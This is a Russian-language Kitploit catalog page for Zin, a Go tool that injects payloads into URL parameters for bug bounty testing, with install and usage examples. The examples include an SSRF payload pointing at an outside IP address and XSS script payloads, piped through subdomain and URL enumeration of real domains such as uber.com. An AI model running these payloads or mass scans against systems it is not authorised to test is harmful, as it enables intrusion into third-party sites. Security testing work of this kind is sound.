Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Zin — Инжектор полезной нагрузки для багбаунти, написанный на Go | Kitploit
Инструменты/GitHubGitHub/ethicalhackingplayground/zin
Эксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubethicalhackingplayground/zin

Zin

Инжектор полезной нагрузки для багбаунти, написанный на Go

Репозиторий
70266 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

alt text

Версия 1.0

😎 Zin 😎

Инжектор полезных нагрузок для баг-баунти, написанный на Go

Изображение с Gyazo

Возможности

  • Инжектировать несколько полезных нагрузок во все параметры
  • Инжектировать одну полезную нагрузку во все параметры
  • Сохраняет ответы в выходную папку
  • Отображает код состояния и длину ответа
  • Может выполнять grep для поиска шаблонов в ответе
  • Очень быстро
  • Легко настроить

Установка

$ go get -u github.com/ethicalhackingplayground/Zin

Новые возможности

  • ✅ Поиск шаблонов в ответах
  • ✅ Фильтрация по кодам состояния

Аргументы

root@kitploit:~
      _
     (_)
  _____ _ __
 |_  / | '_ \
  / /| | | | |
 /___|_|_| |_|


Пусть баунти приходят


  -c int
        уровень параллелизма (по умолчанию 20)
  -g string
        выполнить grep ответа на совпадения
  -p string
        полезная нагрузка для использования
  -pL string
        список полезных нагрузок для использования
  -s int
        фильтр по кодам состояния (по умолчанию 200)
        

Пример SSRF

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

Пример XSS

$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"

Инжектирование нескольких полезных нагрузок

$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>

Сканирование поддоменов

$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>

Тестирование только параметров

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"

Несколько хостов

$ cat hosts | gau | Zin -c 80 -p <payload>

Если вы получили баунти, пожалуйста, поддержите, купив мне кофе


Купи мне кофе
Скачать инструмент